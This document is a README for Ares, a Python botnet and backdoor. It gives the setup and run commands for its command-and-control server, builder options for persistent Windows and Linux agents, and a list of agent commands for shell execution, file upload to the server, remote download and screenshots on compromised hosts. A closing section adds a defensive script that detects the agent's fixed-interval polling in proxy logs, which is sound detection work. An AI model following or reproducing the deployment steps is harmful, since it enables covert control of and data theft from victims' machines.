Ares - Python Botnet and Backdoor
Ares is a Python-based remote access tool.
It is made of two main programs:
- A Command and Control server, which is a Web interface to administer the agents
- An agent program, which is run on the compromised host, and ensures communication with the CNC
The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.
Setup
Install the Python requirements:
pip install -r requirements.txt
cd server
./ares.py initdb
In order to compile Windows agents on Linux, set up wine (optional):
./wine_setup.sh
Server
Run with the built-in (debug) server:
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
Agent
Run the Python agent (update config.py to suit your needs):
cd agent
./agent.py
Build a new agent to a standalone binary:
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent
To see a list of supported options, run ./builder.py -h
./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                  [--max_failed_connections MAX_FAILED_CONNECTIONS]
                  [--persistent]

Builds an Ares agent.

optional arguments:
  -h, --help            show this help message and exit
  -p PLATFORM, --platform PLATFORM
                        Target platform (Windows, Linux).
  --server SERVER       Address of the CnC server (e.g http://localhost:8080).
  -o OUTPUT, --output OUTPUT
                        Output file name.
  --hello-interval HELLO_INTERVAL
                        Delay (in seconds) between each request to the CnC.
  --idle_time IDLE_TIME
                        Inactivity time (in seconds) after which to go idle. In
                        idle mode, the agent pulls commands less often (every
                        <hello_interval> seconds).
  --max_failed_connections MAX_FAILED_CONNECTIONS
                        The agent will self destruct if no contact with the
                        CnC can be made <max_failed_connections> times in a
                        row.
  --persistent          Automatically install the agent on first run.
Supported agent commands:
<any shell command>            Executes the command in a shell and return its output.
upload <local_file>            Uploads <local_file> to server.
download <url> <destination>   Downloads a file through HTTP(S).
zip <archive_name> <folder>    Creates a zip archive of the folder.
screenshot                     Takes a screenshot.
python <command|file>          Runs a Python command or local file.
persist                        Installs the agent.
clean                          Uninstalls the agent.
exit                           Kills the agent.
help                           This help.
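Because the agent polls the CnC over HTTP at a fixed hello-interval (and at a second, longer fixed period once idle), that constant request spacing is what a defender can look for in web proxy logs. The detector below is an added example, not part of Ares or of this page; its log format, client addresses and hostnames are constructed placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlparse

# Constructed sample proxy log (not real traffic), "<timestamp> <client> <method> <url>":
# 10.0.0.5 hits one host every 30 s (hello-interval 30); 10.0.0.7 browses irregularly.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 GET http://cnc.example.invalid/
2024-01-01T10:00:30 10.0.0.5 GET http://cnc.example.invalid/
2024-01-01T10:01:00 10.0.0.5 GET http://cnc.example.invalid/
2024-01-01T10:01:30 10.0.0.5 GET http://cnc.example.invalid/
2024-01-01T10:02:00 10.0.0.5 GET http://cnc.example.invalid/
2024-01-01T10:02:30 10.0.0.5 GET http://cnc.example.invalid/
2024-01-01T10:00:05 10.0.0.7 GET http://www.example.com/index.html
2024-01-01T10:00:52 10.0.0.7 GET http://www.example.com/style.css
2024-01-01T10:01:04 10.0.0.7 GET http://www.example.com/app.js
2024-01-01T10:03:14 10.0.0.7 GET http://www.example.com/news
2024-01-01T10:03:17 10.0.0.7 GET http://www.example.com/img.png
2024-01-01T10:07:40 10.0.0.7 GET http://www.example.com/about
"""

LINE_RE = re.compile(r"^(\S+) (\S+) \S+ (\S+)$")

def find_beacons(log, min_requests=5, max_cv=0.1):
    """Return {(client, host): mean_gap_seconds} for client/host pairs whose
    request spacing is nearly constant (coefficient of variation <= max_cv).
    Human browsing is bursty; a timer-driven poll has almost no jitter."""
    times = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the whole analysis
        ts, client, url = m.groups()
        times[(client, urlparse(url).netloc)].append(datetime.fromisoformat(ts))
    beacons = {}
    for key, stamps in times.items():
        if len(stamps) < min_requests:
            continue  # too few samples to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[key] = round(avg)
    return beacons

if __name__ == "__main__":
    for (client, host), period in find_beacons(SAMPLE_LOG).items():
        print(f"{client} polls {host} every ~{period}s")
```

Raising max_cv tolerates agents that add jitter, at the cost of more false positives from legitimate pollers such as update checkers, so whitelist those hosts rather than loosening the threshold.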